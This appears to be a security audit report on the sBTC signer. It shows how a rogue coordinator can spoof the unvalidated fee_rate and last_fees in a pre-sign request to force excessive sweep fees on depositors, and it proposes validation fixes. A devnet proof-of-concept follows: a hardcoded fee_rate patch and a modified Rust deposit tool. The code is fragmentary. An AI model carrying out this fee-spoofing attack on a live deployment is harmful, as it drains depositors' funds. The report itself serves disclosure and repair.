As part of the sweep tx creation/validation process, the coordinator creates a transaction package and sends it for signers to pre-approve. If the package is approved by enough signers, the package transactions are then signed and broadcasted. Package pre approval is handled by signers in handle_bitcoin_pre_sign_request. Signers validate every significant detail in the package through their own db/client-connections to avoid trusting the coordinator who, as a single entity, is not trusted and may try to compromize the system.
One exception however is the fee_rate and last_fees which are provided at part of the PreSignRequest and are not validated by the signers. This enables a rogue signer to maliciously cause financal loss to depositors by spoofing the current fee_rate required by the bitcoin blockchain, or by spoofing last_fees even though no existing package is in the mempool (both having the same effect of imposing an unneccesarily exccesive fee on depositors).
Vulnerability Details
Attack scenario:
A rogue signer decides to compromize the sbtc system's reputation/reliability by causing financial loss to depositors.
Whenever its this signer's turn to be a coordinator, they search through all current valid, pending deposits for deposit requests with very high max_fee settings.
If the signer finds such requests, they "spoof" the fee_rate retrieved from the bitcoin client to a much higher value. The signer chooses a value that is just high enough to extract the maximum fee posiible from the deposit/s without failing the minimum max_fee validation test.
The signer constructs a transaction package with the spoofed fee_rate. Given the bloated fee_rate, deposit requests with a conservative max_fee setting will be filtered out, leaving only those with high enough max_fee to pass the max_fee validation even with the spoofed fee_rate.
The Signer then sends a preSignRequest for the package. Since the only invalid data in the package is the fee_rate (which in itself is not validated by signers) the package is approved and signed.
A sweep transaction is sent with an abnormally high fee_rate that can drain the entire deposit amount.
Impact Details
Financial loss caused to depositors: their deposit is processed but with a fee_rate that is much higher than the real chain fee_rate causing them to pay a fee that is orders of magnitude higher than they should have.
fee_rate validation
While the exact fee_rate might change between the time the Coordinator samples it and the time the signers validate the PreSignRequest, you could check for some reasonable deviation between the two (e.g. fee_rate given in the preSignRequest is within 20% of the one obtained by the signer).
last_fee validation
Since the same attack can be achieved by spoofing a last_fee, signers should also validate last_fee, obtaining it in the same way the coordinator does (should have the same value as provided by the coordinator).
This POC simulates a scenario where a single deposit request is pending with max_fee = 1602000 and amount = 1682100. The coordinator sets a fake fee_rate of 6000 (the maximum that will still enable the deposit request to pass the max_fee validation). The depositor ends up paying a fee of 1,410,000 (~$1373), about x100 what they would pay if the real fee_rate (typically 60 on the devenv) was used.
How to run
Make the following temporary change in sbtc/signer/src/bitcoin/ line 1227:
let fee_rate = 6000.0;//bitcoin_client.estimate_fee_rate().await?;
Create a backup for and replace its content with the code below.
Main changes:
a. Instead of setting the deposit tx amount to the sum of the call parameters 'amount' and 'max_fee', we assume the given 'amount' parameter represents the total amount and set the deposit amount to 'amount' only.
b. A donation is added at the start of exec_deposit because we call demo_cli directly and not through the shell script that handles donation.
use std::str::FromStr;
use bitcoin::hex::DisplayHex;
use bitcoin::{
absolute, transaction::Version, Amount, Network, OutPoint, ScriptBuf, Sequence, Transaction,
TxIn, TxOut,
use bitcoin::{Address, XOnlyPublicKey};
use bitcoincore_rpc::json;
use bitcoincore_rpc::{Client, RpcApi};
use clap::{Args, Parser, Subcommand};
use clarity::{
types::{chainstate::StacksAddress, Address as _},
vm::types::{PrincipalData, StandardPrincipalData},
use emily_client::{
configuration::{ApiKey, Configuration},
use fake::Fake as _;
use rand::rngs::OsRng;
use sbtc::deposits::{DepositScriptInputs, ReclaimScriptInputs};
use secp256k1::PublicKey;
use signer::config::Settings;
use signer::keys::SignerScriptPubKey;
use signer::storage::model::StacksPrincipal;
#[derive(Debug, thiserror::Error)]
enum Error {
#[error("Signer error: {0}")]
SignerError(#[from] signer::error::Error),
#[error("Bitcoin RPC error: {0}")]
BitcoinRpcError(#[from] bitcoincore_rpc::Error),
#[error("Invalid Bitcoin address: {0}")]
InvalidBitcoinAddress(#[from] bitcoin::address::ParseError),
#[error("No available UTXOs")]
#[error("Secp256k1 error: {0}")]
Secp256k1Error(#[from] secp256k1::Error),
#[error("SBTC error: {0}")]
SbtcError(#[from] sbtc::error::Error),
#[error("Emily deposit error: {0}")]
EmilyDeposit(#[from] emily_client::apis::Error<deposit_api::CreateDepositError>),
#[error("Invalid stacks address: {0}")]
#[error("Invalid signer key: {0}")]
#[derive(Debug, Parser)]
struct CliArgs {
command: CliCommand,
#[derive(Debug, Subcommand)]
enum CliCommand {
/// Simulate a deposit request
#[derive(Debug, Args)]
struct DepositArgs {
/// Amount to deposit in satoshis, excluding the fee.
amount: u64,
/// Maximum fee to pay for the transaction in satoshis, in addition to
/// the amount.
max_fee: u64,
/// Lock time for the transaction.
lock_time: u32,
/// The beneficiary Stacks address to receive the deposit in sBTC.
#[clap(long = "stacks-addr")]
stacks_recipient: String,
/// The public key of the aggregate signer.
#[clap(long = "signer-key")]
signer_aggregate_key: String,
#[derive(Debug, Args)]
struct DonationArgs {
/// Amount to deposit in satoshis, excluding the fee.
amount: u64,
/// The public key of the aggregate signer.
#[clap(long = "signer-key")]
signer_aggregate_key: String,
#[derive(Debug, Args)]
struct InfoArgs {
/// The public key of the aggregate signer.
#[clap(long = "signer-key")]
signer_aggregate_key: String,
async fn main() -> Result<(), Box<dyn std::error::Error>> {
let args = CliArgs::parse();
let settings = Settings::new(Some("signer/src/config/default.toml"))?;
// Setup our Emily client configuration by getting the first configured endpoint
// and using that to populate the client.
let mut emily_api_endpoint = settings
.expect("No Emily endpoints configured")
let emily_api_key = if emily_api_endpoint.username().is_empty() {
} else {
Some(ApiKey {
prefix: None,
key: emily_api_endpoint.username().to_string(),
let _ = emily_api_endpoint.set_username("");
let emily_client_config = Configuration {
base_path: emily_api_endpoint
api_key: emily_api_key,
let bitcoin_url = format!(
.expect("No Bitcoin RPC endpoints configured")
let bitcoin_client = Client::new(
bitcoincore_rpc::Auth::UserPass("devnet".into(), "devnet".into()),
.expect("Failed to create Bitcoin RPC client");
match args.command {
CliCommand::Deposit(args) => {
exec_deposit(args, &bitcoin_client, &emily_client_config).await?
CliCommand::Donation(args) => exec_donation(args, &bitcoin_client).await?,
CliCommand::Info(args) => exec_info(args).await?,
async fn exec_deposit(
args: DepositArgs,
bitcoin_client: &Client,
emily_config: &Configuration,
) -> Result<(), Error> {
//Audit Comment: donation added here since the POC calls this file directly and not through the shell script that handles donation before the call
let donargs = DonationArgs{amount:2000000u64,
let (unsigned_tx, deposit_script, reclaim_script) =
create_bitcoin_deposit_transaction(bitcoin_client, &args)?;
let txid = unsigned_tx.compute_txid();
let signed_tx = bitcoin_client.sign_raw_transaction_with_wallet(&unsigned_tx, None, None)?;
println!("Signed transaction: {:?}", hex::encode(&signed_tx.hex));
let tx = bitcoin_client.send_raw_transaction(&signed_tx.hex)?;
println!("Transaction sent: calculated txid {txid:?}, actual txid {tx:?}");
let emily_deposit = deposit_api::create_deposit(
CreateDepositRequestBody {
bitcoin_tx_output_index: 0,
bitcoin_txid: txid.to_string(),
deposit_script: deposit_script.deposit_script().to_hex_string(),
reclaim_script: reclaim_script.reclaim_script().to_hex_string(),
println!("Deposit request created: {:?}", emily_deposit);
async fn exec_donation(args: DonationArgs, bitcoin_client: &Client) -> Result<(), Error> {
let pubkey = XOnlyPublicKey::from_str(&args.signer_aggregate_key)
.or_else(|_| PublicKey::from_str(&args.signer_aggregate_key).map(XOnlyPublicKey::from))
.map_err(|_| Error::InvalidSignerKey(args.signer_aggregate_key.clone()))?;
// Look for UTXOs that can cover the amount + max fee
let opts = json::ListUnspentQueryOptions {
minimum_amount: Some(Amount::from_sat(args.amount)),
let unspent = bitcoin_client
.list_unspent(Some(6), None, None, None, Some(opts))?
// Get a new address for change (SegWit)
let change_address = bitcoin_client
.get_new_address(None, Some(json::AddressType::Bech32))?
// Create the unsigned transaction
let unsigned_tx = Transaction {
input: vec![TxIn {
previous_output: OutPoint {
txid: unspent.txid,
vout: unspent.vout,
script_sig: Default::default(),
sequence: Sequence::ZERO,
witness: Default::default(),
output: vec![
TxOut {
value: Amount::from_sat(args.amount),
script_pubkey: pubkey.signers_script_pubkey(),
TxOut {
value: Amount::from_sat(unspent.amount.to_sat() - args.amount - 153),
script_pubkey: change_address.into(),
version: Version::TWO,
lock_time: absolute::LockTime::ZERO,
let signed_tx = bitcoin_client.sign_raw_transaction_with_wallet(&unsigned_tx, None, None)?;
println!("Signed transaction: {:?}", hex::encode(&signed_tx.hex));
let tx = bitcoin_client.send_raw_transaction(&signed_tx.hex)?;
println!("Transaction sent: {tx:?}");
async fn exec_info(args: InfoArgs) -> Result<(), Error> {
let pubkey = XOnlyPublicKey::from_str(&args.signer_aggregate_key)
.or_else(|_| PublicKey::from_str(&args.signer_aggregate_key).map(XOnlyPublicKey::from))
.map_err(|_| Error::InvalidSignerKey(args.signer_aggregate_key.clone()))?;
println!("Signers pubkey (for bridge): {pubkey}");
let address =
Address::from_script(&pubkey.signers_script_pubkey(), bitcoin::Network::Regtest).unwrap();
println!("Signers bitcoin address (for donation): {address}");
let random_principal: StacksPrincipal = fake::Faker.fake_with_rng(&mut OsRng);
"Random stacks address (for demo recipient): {}",
fn create_bitcoin_deposit_transaction(
client: &Client,
args: &DepositArgs,
) -> Result<(Transaction, DepositScriptInputs, ReclaimScriptInputs), Error> {
let pubkey = XOnlyPublicKey::from_str(&args.signer_aggregate_key)
.or_else(|_| PublicKey::from_str(&args.signer_aggregate_key).map(XOnlyPublicKey::from))
.map_err(|_| Error::InvalidSignerKey(args.signer_aggregate_key.clone()))?;
let deposit_script = DepositScriptInputs {
signers_public_key: pubkey,
max_fee: args.max_fee,
recipient: PrincipalData::Standard(StandardPrincipalData::from(
let reclaim_script = ReclaimScriptInputs::try_new(args.lock_time, ScriptBuf::new())?;
//Audit Comment: changed to set only amount as deposit amount (without adding max_fee)
// Look for UTXOs that can cover the amount
let opts = json::ListUnspentQueryOptions {
minimum_amount: Some(Amount::from_sat(args.amount /*+ args.max_fee*/)),
let unspent = client
.list_unspent(Some(6), None, None, None, Some(opts))?
// Get a new address for change (SegWit)
let change_address = client
.get_new_address(None, Some(json::AddressType::Bech32))?
// Create the unsigned transaction
let unsigned_tx = Transaction {
input: vec![TxIn {
previous_output: OutPoint {
txid: unspent.txid,
vout: unspent.vout,
script_sig: Default::default(),
sequence: Sequence::ZERO,
witness: Default::default(),
output: vec![
TxOut {
value: Amount::from_sat(args.amount /*+ args.max_fee*/),
script_pubkey: sbtc::deposits::to_script_pubkey(
TxOut {
value: Amount::from_sat(unspent.amount.to_sat() - args.amount /*- args.max_fee*/ - 153),
script_pubkey: change_address.into(),
version: Version::TWO,
lock_time: absolute::LockTime::ZERO,
"deposit script: {:?}",
"reclaim script: {:?}",
Ok((unsigned_tx, deposit_script, reclaim_script))